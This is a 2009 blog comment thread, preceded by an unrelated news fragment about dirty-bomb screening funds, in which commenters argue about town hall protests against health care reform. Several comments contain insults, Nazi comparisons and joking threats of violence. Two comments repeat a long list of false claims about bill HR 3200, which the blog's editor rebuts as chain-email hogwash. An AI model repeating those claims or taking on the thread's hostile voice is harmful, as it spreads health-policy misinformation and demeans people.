The mayor is also lobbying Congress for $ 40 million to complete a massive screening system for radiation - spewing “ dirty bombs , ” but says the money is being held up by “ politics as usual . ”
He contended that the money belongs where the biggest threats are , not where politicians hope to earn votes .
“ They ’re trying to spread Homeland Security money around the country , ” he said .
“ They ’ve turned it into pork barrel . ”
READER COMMENTS ON
" VIDEO : Maddow Explains Who 's Running , Enflaming the Republicanist Town Hall Mob Show "
( 49 Responses so far ... )
COMMENT # 1 [ Permalink ]
... Big Dan said on 8/6/2009 @ 8:42 pm PT ...
Rightwing media , corporations , and the GOP are trying to incite violence .
It 's for one reason : the GOP is in the minority .
They can only intimidate .
The fakesters say " We 've been silent too long " , as if they 're real activists .
Yeah , they 've been silent exactly EIGHT YEARS : the eight years of the Bush administration .
They 're FAKE !
The most important thing , is the FAKE " liberal media " broadcasting it , saying they 're legitimate ... and not pointing out it 's FAKE .
The FAKE " liberal media " is n't inept , they 're doing their job : propaganda !
WAKE UP , PEOPLE !
If you do n't realize the mainstream media is n't " liberal " and part of the sham is getting you to believe it 's liberal ... there 's really no hope for you .
Do n't go around saying : " They 're not doing their job " , then YOU DON'T GET IT !!!
If everyone exposes all this stuff , and does n't point out that the " liberal media " is n't liberal and it's a SHAM ... read the book " The Republican Noise Machine " by David Brock .
David Brock says the " liberal media " is a HOAX !
Use your own head , too .
Look at the FACTS in front of your FACE .
It 's all for not ... if you do n't additionally get it , that they ARE doing their job .
You will continuously go around fruitlessly and incorrectly saying and thinking " they 're not doing their job " .
Do you honestly think that ?
You 've probably been saying all your life , that they are n't doing their job .
Do you know why ?
Do you know why your whole life you 've been saying " they 're not doing their job " or when they DO report something ( rarely ) good , you say " they 're turned the corner " ... but then once again you realize they have n't ?
Because they never were liberal , we 've just been told that by the same people who are in on the SHAM .
I get it .
I 'm 100 % certain I am right .
Will everyone else please get it ?
COMMENT # 2 [ Permalink ]
... Big Dan said on 8/6/2009 @ 8:44 pm PT ...
LOOK : AP reported on town hall disruptions , ignored conservative strategy http://mediamatters.org/research/200908060014
COMMENT # 3 [ Permalink ]
... Big Dan said on 8/6/2009 @ 8:45 pm PT ...
They ignored it ON PURPOSE !
Do you think they do n't know what WE know ?
They 're not that stupid !
They can not POSSIBLY be that stupid !
There is a 100 % chance they are purposely ignoring it .
COMMENT # 4 [ Permalink ]
... Big Dan said on 8/6/2009 @ 9:03 pm PT ...
Read : David Brock , the reformed conservative noise - maker , on how the Right has sabotaged journalism , democracy , and truth .
As a young journalist in the 1990s , David Brock was a key cog the Republican noise machine .
Writing for the American Spectator , a conservative magazine funded by billionaire Richard Mellon Scaife , Brock gained fame for his attack pieces on Anita Hill and President Bill Clinton .
Then , in 2002 , Brock came clean .
In his memoir , Blinded by the Right , Brock admitted that his work was based on lies and distortion , and part of a coordinated smear campaign funded by wealthy right wing groups to discredit Clinton and confuse the public .
Since then , Brock has continued to expose the conservative media onslaught .
In his newest book , The Republican Noise Machine , Brock documents how right - wing groups pressure the media and spread misinformation to the public .
It 's easy to see how this is done .
Fringe conspiracies and stories will be kept alive by outlets like Rush Limbaugh , the Washington Times , and the Drudge Report , until they finally break into the mainstream media .
Media groups like Brent Bozell 's Media Research Center have spent 30 years convincing the public that the media is , in fact , liberal .
As Brock says , it 's all a sham : " I have seen , and I know firsthand , indeed from my own pen , how the organized Right has sabotaged not only journalism but also democracy and truth . "
The Republican Noise Machine David Brock's MediaMatters.org .
COMMENT #5 [ Permalink ]
... Big Dan said on 8/6/2009 @ 9:05 pm PT ...
David Brock can be described no better than " whistleblower " , he was one of them .
He tells you exactly what they do , from being on the inside .
COMMENT #6 [ Permalink ]
... Luther Weeks said on 8/6/2009 @ 10:43 pm PT ...
Video from Connecticut , shows Anthem Blue Cross golf shirt on protester that actually says nobody is behind the protest .
http://www.myleftnutmeg....ing-sponsored-by-anybody
COMMENT # 7 [ Permalink ]
... eric said on 8/7/2009 @ 12:06 am PT ...
I wish we all , who support health care reform , could quickly organize mass protests and marches in favor of a public plan .
I bet our numbers would be overwhelming .
COMMENT #8 [ Permalink ]
... Floridiot said on 8/7/2009 @ 12:42 am PT ...
That 's it Luther , I figured there is a lot of health insurance company workers in Tampa afraid of losing their jobs .
I 'll go so far as to say better than 90 % of those " outraged citizens " are same , there is like 2 - 3 million in the US ... but will the media report it ?
COMMENT #9 [ Permalink ]
... Floridiot said on 8/7/2009 @ 12:53 am PT ...
I say they 're using Beck et al as a diversion to plant health insurance company workers at the town halls , with a smidgen of tea - baggers joining in .
They look like the type on the video .
You hear this Countdown and Rachel producers ?
COMMENT # 10 [ Permalink ]
... Disllusioned said on 8/7/2009 @ 12:57 am PT ...
If MSNBC were n't reporting this , Imagine how few people would even know about it .
COMMENT # 11 [ Permalink ]
... Jeannie Dean said on 8/7/2009 @ 3:26 am PT ...
Outrageous video from Tampa !
But O! Calloo , Callay !
To see the doors slammed in the faces of REPUBLICAN protesters in Florida for a change .
Like breathing fresh - mountain air after years of being told fresh - mountain air freshener is the better thing .
Also good to know that Florida 's anti-democratic tendency to hold public meetings ( and private vote counting ) behind closed doors is a strategy meant to vex both election observer Ellen Brodsky and torch - bearing angry mobs .
( Tho ' just try guessing which meeting is more likely to result in arrest ! )
I 'm pretty sure we saw that stupifying scene ( despite the Fox pro-health insurance company spin ) thanks to the incredible activists in the Tampa / St. Pete area , who I know were organizing to arrive early and re-keel the battle in support of Cathy Castor .
And Beck has to go , YESTERDAY .
Before someone gets really hurt .
This is not just the zenith of irresponsible journalism and low - ball blather - jeezus , it 's " inciting a riot " ?
What are the odds of that sticking , anyone , given that Fox already has legal precedence from the courts that allows them to lie .
Eric ( #7 ) - I understand the AFL - CIO is organizing it 's ranks to counter - tuit some of this madness : http://www.huffingtonpos...on-conserv_n_252720.html
Oh , I 'm so in .
Dear fact - challenged , horrible assbags out there shilling for rich corporations by blocking any meaningful debate with my legislator about my health care : I 'm coming to a " town hall " near you ...
Let 's put your great health care to the test .
COMMENT # 12 [ Permalink ]
... Floridiot said on 8/7/2009 @ 4:00 am PT ...
" Protester " admits he " sells drugs " to the reporter Click on " tensions run high
COMMENT # 13 [ Permalink ]
... Big Dan said on 8/7/2009 @ 6:08 am PT ...
Technically , these FAKE protesters are made up of astroturfers , but also of idiots who believe their scare tactic lies like death sentences for old people .
They make up lies to scare people , and some of these " protesters " are probably real people who are scared of : health care change death sentence for old people , illegal aliens , birthers , etc ...
The birthers are real , and falling for lies .
See ?
Idiots can be easily tricked by the astroturfers .
They can be easily whipped up into a frenzy with lies , because they 're stupid .
Sorry for being so blunt , but they 're stupid .
It is TRUE , they can find someone , interview them , and that person is not being paid by the astroturfers .
BUT ... they are there because they believe the astroturfers ' lies .
I heard some interviews the " liberal media " is putting up , interviewing some protesters .
They say : " I am not being paid by anyone " .
BUT ... where 's the follow up question , of whether they think health care change is a death sentence for the elderly , like they lies the astroturfers are telling them ?
So , the FAKE " liberal media " is doing their propaganda job again : interviewing someone who is n't being paid by the astroturfers ... BUT NOT FOLLOWING UP AND ASKING IF THEY BELIEVE THEIR LIES !!!
COMMENT # 14 [ Permalink ]
... Big Dan said on 8/7/2009 @ 6:18 am PT ...
The NEW tactic by the FAKE " liberal media " enablers , is to interview ONE person who says " I 'm not being paid by anyone to be here " , and this is expected to somehow give legitimacy to the Town Hall protesters .
But the protesters are are made of up TWO factions : 1 . The FAKE astroturfers
2 . The IDIOTS who believe their lies --->>>
THESE ARE THE ONES BEING EXCLUSIVELY INTERVIEWED BY THE FAKE LIBERAL MEDIA ENABLERS !!!
THEY AREN'T INTERVIEWING THE ASTROTURFERS !!!
The astroturfers ' " useful idiots " can be whipped up into a frenzy by them any time for any reason : Obama is n't a citizen , health care reform will kill old people , etc ...
When the FAKE " liberal media " interviews a protester who says they 're not being paid by anyone , why do n't they ask them if they think Obama is a citizen and if health care reform will kill old people ???
This would prove that these protesters are the astroturfers ' " useful idiots " .
COMMENT # 15 [ Permalink ]
... Big Dan said on 8/7/2009 @ 6:21 am PT ...
If the " liberal media " interviews a protester and they also say they think Obama 's a citizen and health care reform wo n't kill old people , THEN I will say that 's a legitimate protester .
I have n't seen that yet .
The FAKE " liberal media " : NOW throwing up in our faces , protesters who are n't being paid or are n't shills ... BUT ARE IDIOTS who probably also believe Obama is n't a citizen AND health care reform kills old people !
HALF the story , as usual again , by the FAKE " liberal media " , like some kind of INFOMERCIAL FOR RICH PEOPLES ' INTERESTS !!!
COMMENT # 16 [ Permalink ]
... Big Dan said on 8/7/2009 @ 7:04 am PT ...
The mainstream media speaks for the wealthy , corporations , the military , and the government ... but only when the government is doing thing for corporate interests .
The Republicans ALWAYS do things for corporate interests .
When Obama continued the Bush / Paulson bailouts , that was in corporate interests , so the mainstream media did n't attack him .
When Obama tries something progressive or liberal like health care reform , what does the mainstream media do ?
What did they do ?
1 . They showed the Town Hall protests and portrayed them as REAL GRASSROOTS .
What did they do when the astroturfers were exposed ?
2 . They started interviewing protesters who said they were n't being paid .
So , every step of the way , the mainstream media is trying to give legitimacy to shill protests ...
BECAUSE THEY AREN'T IN CORPORATE INTERESTS !
The mainstream media is n't " liberal " , it speaks for the wealthy , corporations , the military , and government ONLY WHEN GOVERNMENT DOESN'T TRY ANYTHING PROGRESSIVE !
Watch this :
http://www.youtube.com/w...;feature=player_embedded
COMMENT # 17 [ Permalink ]
... Big Dan said on 8/7/2009 @ 7:07 am PT ...
The mainstream media is DOING THEIR JOB !
They 're supposed to speak for the wealthy , corporations , the military , and the government only when government speaks for them .
So , do n't say " they are n't doing their job " , or when they rarely report something for the public interest instead of corporate interests , do n't say : " They 've turned the corner and are doing their job " .
It 's the opposite : when they report something in the public and not the corporate interests ... it's a FLUKE and they 're NOT doing their job !
Watergate was a FLUKE you 'll never see again !
They took care of that in the last few decades .
You 'll never see a president ever taken down again , unless they 're doing something NOT IN THE CORPORATE INTERESTS !
COMMENT # 18 [ Permalink ]
... Big Dan said on 8/7/2009 @ 7:08 am PT ...
... and this concludes my RANT ... thank you !
COMMENT # 19 [ Permalink ]
... MsKitty said on 8/7/2009 @ 7:10 am PT ...
Do not underestimate the ' tea baggers ' size or ability to mobilize .
To them socialism represents the Soviet Union and Stalin , a non-transparent totalitarian state .
Very scary !
To them the democratic socialist / capitalist countries in Europe do n't exist , where countries live peacefully , there is universal healthcare and universal higher education .
So , why are the Danes so happy ?
The key to success whatever in government system you have is TRANSPARENCY , INDEPENDENT MEDIA and RELIABLE ACCURATE VOTING .
When we have all of these , we will be a totally free people .
Keep up the great work Brad and company !
COMMENT # 20 [ Permalink ]
... Damail said on 8/7/2009 @ 8:50 am PT ...
The St. Louis Post - Dispatch is reporting that a conservative activist was beaten by lefty loon protestors last night .
So do n't you stand there and act like your side is all sweet and innocent , folks .
These protests are real .
It is Rachel Maddow who is fake .
MSLSD 's pathetic ratings reflect that .
COMMENT # 21 [ Permalink ]
... Big Dan said on 8/7/2009 @ 8:50 am PT ...
Another question : how come during the Bush years , anti-Bush protesters ( and it was n't " astroturfing " ) were not let in , tazed , jailed , etc ...???
You see all the time , the lawsuits now coming to an end , where they 're won $ $$ for having their rights violated .
Amy Goodman was even arrested at the RNC convention .
These idiots and astroturfers are allowed in to Town Hall meetings , allowed to shout down any debate , etc ... and nothing happens to them .
Not that I 'm FOR it , but why are n't they being treated the same as protesters during the Bush years ?
COMMENT # 22 [ Permalink ]
... Big Dan said on 8/7/2009 @ 8:52 am PT ...
Where was the " liberal media " coverage of protesters during the Bush years ?
Where 's the " liberal media " coverage of all the anti-War protesters over the last 8 years ?
Someone should compare the " liberal media " coverage of the anti-War protesters over EIGHT YEARS vs. the " liberal media " coverage of the Town Hall protesters OVER THE LAST WEEK !!!!!
COMMENT # 23 [ Permalink ]
... Big Dan said on 8/7/2009 @ 8:53 am PT ...
Actually , there 's anti-War protests GOING ON RIGHT NOW ... but they 're not being covered !
COMMENT # 24 [ Permalink ]
... Amerikagulag said on 8/7/2009 @ 9:14 am PT ...
The real fraud is trying to perpetuate the myth that there 's a dime 's worth of difference between the RED and BLUE of the One - party system .
Obama had support for CHANGE .
We 're still in Iraq ILLEGALLY .
We 're still in Afghanistan ILLEGALLY .
Now we 're talking about attacking Iran ILLEGALLY .
I did n't vote for him .
I voted for McKinney - that former congresswoman who was captured by Israeli Terrorist pirates in international waters and held hostage for several days , and about which Obama said NOTHING .
The writing 's on the wall folks .
Anyone who believes there are two parties in this nation is severely deluded .
Just ask Jonathan Turley .
More bailouts for the wealthy bankers .
More money for illegal invasions .
More money for Insurance companies .
The health care sham .... well just wait .
Obama is a tool just like the bush was .
COMMENT # 25 [ Permalink ]
... Floridiot said on 8/7/2009 @ 9:45 am PT ...
I 'm not worried about the " teabaggers size " .
If he 's big it will make a better target when I kick him in the teabag .
nicey - nicey is over .
COMMENT # 26 [ Permalink ]
... Agent 99 said on 8/7/2009 @ 11:40 am PT ...
Yep , Flo , nicey - nicey is indeed over , but the part that fries me is that they will have all of us fighting each other instead of them .
I heard some great ideas for dealing with these shills at the Town Halls on Malloy last night : -- grab as many brown shirts from the second - hand stores as you can and pass them out to whoever starts yelling at the meetings ; -- begin chanting U - S - A , U - S - A as loudly as possible whenever they start in ; and -- take their picture when they open their mouths were some of the best ones I heard .
I , for the life of me , ca n't see what 's wrong with announcing at the very beginning of the meetings that this is a very well publicized plan to disrupt the orderly course of interaction with our representation and so anyone standing up and yelling this shit will be removed and prosecuted .
More like they will accomplish their goal , though , and the best we are going to get is citizens making them pay for it with their bruised teabags .
COMMENT # 27 [ Permalink ]
... Kate said on 8/7/2009 @ 2:54 pm PT ...
I am a constitutionalist & donot feed into the fake Republican / Democrat 2 party paridigm illusion .
I have attended in protest for this healthcare control scheme .
I am a middle american so please stop portraying many of us as right wing brown shirts .
Your blog reminds me of the Nixon years of stopping desent instead of calling names .
Obama is a fascist dictator whom does n't want disenters or protesters , Only " YES " men / women .
If you have a problem with this message email to flag@whitehouse.gov and snitch away .
COMMENT # 28 [ Permalink ]
... Steve Heller said on 8/7/2009 @ 2:59 pm PT ...
" In loyalty to their kind they can not tolerate our minds .
In loyalty to our kind we cannot tolerate their obstruction . " [ ed note :
Hint for young people ... -- 99 ]
COMMENT # 29 [ Permalink ]
... Big Dan said on 8/7/2009 @ 3:29 pm PT ...
Kate : 2 questions : 1 . Why are you protesting ?
2 . Did you protest during the 8 years of Bush / Cheney .
If you protested during the Bush / Cheney years , why did you protest ?
COMMENT # 30 [ Permalink ]
... Big Dan said on 8/7/2009 @ 3:32 pm PT ...
3 . Do you think " dissent " was stopped during the Bush / Cheney years ?
Can I make a prediction ?
Kate " stumbled upon this blog " and is n't coming back .
( astroturfing )
COMMENT # 31 [ Permalink ]
... Floridiot said on 8/7/2009 @ 5:43 pm PT ...
Yup , Luthers clip was on Countdown tonight in the # 5 story three times , lol
COMMENT # 32 [ Permalink ]
... Floridiot said on 8/7/2009 @ 6:06 pm PT ...
My # 12 link was on Rachel , he -he
COMMENT # 33 [ Permalink ]
... Floridiot said on 8/7/2009 @ 6:15 pm PT ...
Frank Schafer quotes Bart Simpson , " The election broke their brains " ( on Rach tonight )
COMMENT # 34 [ Permalink ]
... Agent 99 said on 8/7/2009 @ 6:19 pm PT ...
I 'm telling you guys , this is how the plutocrats got Mussolini in power in Italy , and Hitler in power in Germany .
Suddenly , there 's a whole fresh population of right wing shills popping up here and across the web again .
Suddenly , I 'm getting copies of the filthy crap being cranked out on the right wing email lists again ... we are talking psychedelic stuff , waaaaay designed to enflame , without the least regard for the actual , and it is working .
THIS IS NOT A DRILL .
We are in trouble deep .
They did n't have anything close to a majority in Italy and Germany back in the 1930s either , but they had bottomless funds , and they got it done .
This is n't Michael Jackson gossip or anything to be all controversied - out about .
This is the unmistakable appearance of third millennium Brown Shirts .
This is a SERIOUS threat to any hope of getting our country back .
COMMENT # 35 [ Permalink ]
... Floridiot said on 8/7/2009 @ 7:16 pm PT ...
COMMENT # 36 [ Permalink ]
... Floridiot said on 8/7/2009 @ 8:22 pm PT ...
I 'd like to thank the people of New York for giving us Anthony Weiner .
http://www.msnbc.msn.com/id/26315908/#32337739
COMMENT # 37 [ Permalink ]
... Agent 99 said on 8/7/2009 @ 9:02 pm PT ...
Yeah , well Zogby was skirting the issue and indulging in put - downs of people who may not be the most sophisticated critical thinkers , but do have reason to be angry and fearful .
We spend so much time climbing all over Tush Lumpboil , Pill O'Really and Henn Peck , ignoring that their fabulous salaries , way out of proportion to what they bring in from advertising , are being paid by enemies of the Constitution , enemies of the people ... profit - crazed plutocrats who make boatloads on wholesale slaughter and unsafe food and filthy planet - killing pollutant technologies .
It 's not helpful to call people too hypnotized to realize their enemies are using them for political and monetary gain " stupid " or " racist " or any of the other derogatory terms we love to sling around .
It 's just self - congratulatory blather that keeps us smug and as blind as those we 're calling dolts .
We have to pull out of this idiotic polemic and get real action .
It 's so close to absolutely too late I could just start screaming and never stop .
" Full - blown American Version of the Nazi Brown Shirts " is an absolutely pitch - perfect statement of the situation , les mots juste , and we are waaaaaay closer to as bad as it got in Germany back then than it appears any but a few are willing to mention .
This is TOTALLY unacceptable and TOTALLY un-American , and WE are as culpable as those we revile for this stuff because WE are n't getting this stuff handled either .
This is scary shit , and I 'm still floored that nobody lined up behind Bobby after he yelled out at Live Earth that he'd see us all behind the barricades .
That was two years ago .
He got up and screamed in the faces of the fuckers who killed his father and his uncle , and NOBODY lined up behind him .
I 'm still in shock .
What in the living hell does it take to wake people up ?
A nuke ?
We 're heading for that ....
COMMENT # 38 [ Permalink ]
... Agent 99 said on 8/7/2009 @ 9:10 pm PT ...
No !
Seriously !
Why the hell do we always go postal on the shills instead of getting to the heart of the matter ?
Too fucking pusillanimous is why !
We know good and well none of those assholes would have jobs if we brought down their paymasters , but we do n't .
We have them outnumbered a thousand to one , but we just keep letting ourselves be manipulated into these stupid polemics while they loot the treasury , loot the planet .
Rob .
Us. Blind .
I know , I know , they kill people who get in their way .
It has ever been thus , and it is n't any excuse .
COMMENT # 39 [ Permalink ]
... Patriot Henry said on 8/8/2009 @ 9:42 am PT ...
WOW !!!
I 'm a libertarian who mostly spends time on a libertarian / conservative forum ( less of the former and more of the latter as time goes by unfortunately ) - it 's like a mirror image of the comments here .
Divide and conquer - works like a charm .
Y'all , along with the Republicans / conservatives , are being controlled .
It 'll be very interesting , albeit very sad , to read about the future riots and war between the two parties .
" I 'm not worried about the " teabaggers size " .
If he 's big it will make a better target when I kick him in the teabag .
nicey - nicey is over . " I wo n't be participating , other than perhaps as a photographer and eyewitness , but you " liberals " might want to reconsider fighting the " conservatives " .
I do n't agree with their politics but in a fight I 'm gonna put my money on those people .
They have a much better grasp on the mechanics and techniques and instruments of fighting .
If y'all keep insisting on fighting to determine whether America goes wholly communist or wholly fascist , this is gonna be a civil war .
Thanks in advance for all of the deprivation of liberties and the cessation of the remaining rule of law !
And thanks for all of the dead and wounded !
/ sarcasm .
Regards , Patriot Henry
COMMENT # 40 [ Permalink ]
... Floridiot said on 8/8/2009 @ 10:37 am PT ...
Libertarians can eat my shit , I 'm no liberal by any stretch , where I grew up I was considered middle to center right and some libertarian / conservative assholes moved the goal post far to the right over the last thirty years .
I 'm going to fight like hell to move it back !!!
COMMENT # 41 [ Permalink ]
... Floridiot said on 8/8/2009 @ 10:56 am PT ...
Which side are you on , the middle class or the oligarchs ?
http://www.youtube.com/watch?v=NZkr2yWKk24
COMMENT # 42 [ Permalink ]
... Thebes said on 8/9/2009 @ 12:38 pm PT ...
So , its the " professional protester " line again , but this time from the Obamanoids rather than the Bushevics ?
I think its probably no more true now than when FoxNews was accusing me of being paid by Saddam Hussein !
This country is in a ripe old mess !
Healthcare surely needs to be reformed , but " reforming " it in such a way that pharmaceutical companies are spending 150 MILLION for tv adverts supporting it - that does n't seem quite right .
The problem with medicine in this country is the absurd profits it generates , especially for insurance companies and the drug pushers .
Obamacare does NOTHING to address this problem rather it throws gas on the fire .
And there are these pesky " end of life " provisions and Obama advisers saying things like " Doctors take the Hippocratic Oath too seriously . "
No , I do n't think these are astroturfers , these are PISSED OFF Americans , many of whom realize now that Bush 's excesses have carried over to the current regime ( 1 ) and distrusting of any Federal officials .
( 1 ) A government not following its own constitution can properly be called a regime .
I called Bush 's empire of death a regime and I 'll say it now about Obama too !
COMMENT # 43 [ Permalink ]
... aTeaBagger said on 8/9/2009 @ 3:10 pm PT ...
I stumbled across your blog because I am very interested in the Sibel Edmonds story .
( I have been following stories that show our government 's complicity in 9/11 ) .
I have to agree with several other posters here - you are falling for the ' divide and conquer ' left / right paradigm .
Find those issues that unite , rather than divide and maybe ' we the people ' will come out ahead .
PS - I am a protester .
I protested Bush and now I 'm protesting Congress & Obama 's unconstitutional crap .
In fact it 's Bush that incensed me the most to finally pay close attention , stand up , speak out and encourage others ( even if they do n't always agree with me ) to do the same .
I see very little difference between the two parties .
COMMENT # 44 [ Permalink ]
... TheBigPictureToo said on 8/9/2009 @ 10:23 pm PT ...
The problem with “ Chicago Style ” politics is that it does n’t scale up well .
COMMENT # 45 [ Permalink ]
... Nightrider said on 8/9/2009 @ 10:54 pm PT ...
Wow , skanky lying Maddow is at it again .
Twisting the truth !
I'm a registered Democrat , I DID NOT vote for Obama , he 's a liar .
The grassroots Americans are fed up with all Politicians , the corruption , lying and spending money we do n't have .
Do n't you just love the shit eating smile Maddow has on her face while she 's spouting off her lies .
I read the HC bill , it will screw us ALL if it passed .
READ IT , especially you idiots posting here that think Obamacare is the best thing to come along since sliced bread !!
A commissioner decides who gets care , the young ( babies ) and the elderly can be refused care ( considered nonproductive )
It will expand government by astronomical proportions to try to manage it , ILLEGALS get free care with translators for communication , etc. READ THE BILL !!
Want to know who these people at the town hall meetings really are .
Watch this for the truth .
http://hotair.com/archiv...pan-caller-blasts-media/
[ed note :
Wow , a registered Democrat linking to Michelle Malkin for " the truth " .
Now I 've seen everything .
I 've read the bill , HR 3200 , and while I can agree it 's crappy , not for any of the bald - faced lies you just mentioned .
Not that you 'll ever be back here to need it , but please read our rules for commenting .
Posting knowing disinformation is verboten , and I can only surmise that you have not read the bill if you actually believe what you just posted . -- 99 ]
COMMENT # 46 [ Permalink ]
... Nightrider said on 8/9/2009 @ 11:44 pm PT ...
The video is from C - span liberal fool .
I read the bill again , my post is accurate .
You choose to sell this country out with astronomical debt and lies about how the bill really reads .
Reread the bill and THINK about how the government runs Social Security , Medicare and Medicaid all of them are broke .
This bill is being pushed through for a reason , it is crappy .
It 's being touted as saving money .
The only way this bill will save money is by denying care for people deemed unproductive !
IPg 22 of the HC Bill MANDATES the Govt will audit books of ALL EMPLOYERS that self insure !!
Pg 30 Sec 123 of HC bill - THERE WILL BE A GOVT COMMITTEE that decides what treatments / benefits u get Pg 29 lines 4 - 16 in the HC bill - YOUR HEALTHCARE IS RATIONED !!!
Pg 42 of HC Bill - The Health Choices Commissioner will choose UR HC Benefits 4 you .
U have no choice !
PG 50 Section 152 in HC bill - HC will be provided to ALL non US citizens , illegal or otherwise Pg 58 HC Bill - Govt will have real - time access to individs finances & a National ID Healthcard will be issued !
Pg 59 HC Bill lines 21 - 24
Govt will have direct access 2 ur banks accts 4 elect .
funds transfer PG 65 Sec 164 is a payoff subsidized plan 4 retirees and their families in Unions & community orgs ( ACORN ) .
Pg 72 Lines 8 - 14
Govt is creating an HC Exchange 2 bring priv HC plans under Govt control .
PG 84 Sec 203 HC bill - Govt mandates ALL benefit pkgs 4 priv .
HC plans in the Exchange PG 85 Line 7 HC Bill - Specs for of Benefit Levels for Plans = The Govt will ration ur Healthcare !
PG 91 Lines 4 - 7 HC
Bill - Govt mandates linguistic approp svcs .
Example - Translation 4 illegal aliens Pg 95 HC Bill Lines 8 - 18 The Govt will use groups i.e. , ACORN & Americorps 2 sign up indiv . for Govt HC plan PG 85 Line 7 HC Bill - Specs of Ben Levels 4 Plans .
#AARP members - U
Health care WILL b rationed PG 102 Lines 12-18 HC Bill - Medicaid Eligible Indiv. will b automat.enrolled in Medicaid .
No choice pg 124 lines 24 - 25 HC
No company can sue GOVT on price fixing .
No " judicial review " against Govt Monop pg 127 Lines 1 -16 HC Bill - Doctors / # AMA - The Govt will tell YOU what u can make .
Pg 145 Line 15 - 17 An Employer MUST auto enroll employees into pub opt plan .
NO CHOICE Pg 126 Lines 22 - 25 Employers MUST pay 4 HC 4 part time employees AND their families .
Pg 149 Lines 16 - 24 ANY
Emplyr w payroll 400 k & above who does not prov. pub opt. pays 8 % tax on all payroll pg 150 Lines 9 - 13 Biz w payroll btw 251k & 400 k who doesnt prov. pub .
opt pays 2 - 6 % tax on all payroll Pg 167 Lines 18 - 23 ANY individual who doesnt have acceptable HC accrdng 2 Govt will be taxed 2.5 % of inc Pg 170 Lines 1 - 3 HC Bill Any NONRESIDENT
Alien is exempt from indiv . taxes .
( Americans will pay ) Pg 195 HC Bill - officers & employees of HC Admin ( GOVT ) will have access 2 ALL Americans finan / pers recs PG 203 Line 14 - 15 HC - " The tax imposed under this section shall not be treated as tax " Yes , it says that Pg 239 Line 14 - 24 HC Bill Govt will reduce physician svcs 4 Medicaid .
Seniors , low income , poor affected Pg 241 Line 6 - 8 HC Bill - Doctors , doesnt matter what specialty u have , you 'll all be paid the same PG 253 Line 10 - 18 Govt sets value of Dr's time , prof judg , etc.
Literally value of humans .
PG 265 Sec 1131
Govt mandates & controls productivity for private HC industries PG 268 Sec 1141 Fed Govt regulates rental & purchase of power driven wheelchairs PG 272 SEC .
1145 . TREATMENT OF CERTAIN CANCER HOSPITALS - Cancer patients - welcome to rationing !
Page 280 Sec 1151
The Govt will penalize hospitals 4 what Govt deems preventable readmissions .
Pg 298 Lines 9 -11
Drs , treat a patient during initial admiss that results in a readmiss - Govt will penalize u .
Pg 317 L 13-20 OMG !!
PROHIBITION on ownership / investment .
Govt tells Drs. what / how much they can own .
Pg 317-318 lines 21-25,1-3 PROHIBITION on expansion - Govt is mandating hospitals cannot expand pg 321 2 -13 Hospitals have oppt to apply for exception BUT community input required .
Can u say ACORN ?!!
Pg335 L 16-25 Pg 336-339 - Govt mandates estab . of outcome based measures .
HC the way they want .
Rationing Pg 341 Lines 3 - 9
Govt has authority 2 disqual Medicare Adv Plans , HMOs , etc. Forcing peeps in2 Govt plan Pg 354 Sec 1177 - Govt will RESTRICT enrollment of Special needs ppl !
WTF .
My sis has down syndrome !!
Pg 379 Sec 1191
Govt creates more bureaucracy - Telehealth Advisory Cmtte .
Can u say HC by phone ?
PG 425 Lines 4 - 12 Govt mandates Advance Care Planning Consult .
Think Senior Citizens end of life Pg 425 Lines 17 - 19
Govt will instruct & consult regarding living wills , durable powers of atty .
Mandatory !
PG 425 Lines 22 - 25 , 426 Lines 1 - 3
Govt provides apprvd list of end of life resources , guiding u in death PG 427 Lines 15 - 24 Govt mandates program 4 orders 4 end of life .
The Govt has a say in how ur life ends Pg 429 Lines 1 - 9 An " adv. care planning consult " will b used frequently as patients health deteriorates PG 429 Lines 10 - 12 " adv. care consultation " may incl an ORDER 4 end of life plans .
AN ORDER from GOV Pg 429 Lines 13 - 25 -
The govt will specify which Doctors can write an end of life order .
PG 430 Lines 11 - 15
The Govt will decide what level of treatment u will have at end of life Pg 469 - Community Based Home Medical Services =Non profit orgs .
Hello , ACORN Medical Svcs here !!?
Page 472 Lines 14-17 PAYMENT
TO COMMUNITY - BASED ORG .
1 monthly payment 2 a community - based org .
Like ACORN ?
PG 489 Sec 1308
The Govt will cover Marriage & Family therapy .
Which means they will insert Govt in2 ur marriage Pg 494-498 Govt will cover Mental Health Svcs including defining , creating , rationing those svcs it will COST money we do n't have .
[ ed note :
Yes , I got the same email , originated at Liberty University .
It 's hogwash from start to finish .
Anybody who wants to actually CHECK , can download the pdf of the bill .
Kindly have the decency to either check the facts before you swallow propaganda whole or cease posting crap on this blog . -- 99 ]
COMMENT # 47 [ Permalink ]
... Floridiot said on 8/10/2009 @ 3:42 pm PT ...
An E - Mail from corporate Liberty U? , that 's funny and he fell for it .
Make yourself aware of the BS that 's floating around out there about healthcare or rant at your own peril ... jeez .
COMMENT # 48 [ Permalink ]
... Floridiot said on 8/10/2009 @ 4:04 pm PT ...
Oh , and a new vote slamming outfit to watch .
They say they are forming to COMPETE with ACORN , WTF ?
http://www.associatedcon...ssociation_reclaims.html
http://news.findlaw.com/...90727/27jul20090500.html
COMMENT # 49 [ Permalink ]
... Floridiot said on 8/10/2009 @ 4:56 pm PT ...
To all liberals ( and especially those who are members of the Democratic Party ) ,
Your policies idealistic and utopian .
You push your utopian views on the rest of us .
They are proposed with no consideration of reality , practicality , present or future costs .
Just because it sounds good does n’t make it so .
Every penny that our country borrows has to be paid back , either through taxation or inflation .
There is no way around it .
Yet , you continue to push for policies which will expand our national debt .
It is completely laughable that the Democratic Party Platform — the platform under which our current President was elected contains the following quote : “ We will maintain fiscal responsibility , so that we do not mortgage our children ’s future on a mountain of debt . ”
Anyone who disagrees with your policies is slandered as “ barbaric , ” “ unfeeling , ” or is told that they “ dont care about the poor . ”
Your policies of statism are barbaric .
Your policies of welfare are hurting the poor .
Your policies are schizophrenic .
You offer farmers price supports and subsidies to “ help out poor farmers , ” yet these measures increase the costs of food which end up hurting the poor non-farmers .
The same is true in tobacco : you subsidize tobacco farmers , yet push for increases in tobacco taxes .
You bailout auto companies to help them survive , then you set high emission standards on their cars and fund mass transit which reduces the need for automakers .
You want to tie us all together into you definition of society : a society where were all forced to care for each other and where we are all forced to help each other .
The want to sacrifice all individual rights for the collective rights of society .
It is not wrong to care for people , it is not wrong to help people , but it is wrong for the government to force people to do so .
I dont want to be tied to anyone .
If i choose to help people , let that be my choice .
Why should I be forced to pay for the health care of others ?
Why should I have to pay for their mortgages ?
Why should I be forced to pay for anyone to do anything ?
You conveniently ignore data and facts .
